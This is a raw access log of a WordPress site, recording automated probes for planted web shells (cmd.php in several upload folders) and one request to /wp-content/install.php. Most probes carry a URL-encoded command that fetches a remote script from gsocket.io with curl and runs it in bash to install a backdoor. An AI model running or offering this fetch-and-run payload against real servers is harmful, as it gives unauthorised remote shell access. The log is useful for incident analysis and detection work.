cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:45:16 +0000] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:45:36 +0000] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:46:06 +0000] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:46:58 +0000] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:47:34 +0000] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:47:54 +0000] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 208.110.64.178 - - [13/Jun/2025:05:48:18 +0000] "GET /wp-content/install.php HTTP/1.1" 200 16 "https://cashforcarscarrollton.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:48:39 +0000] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
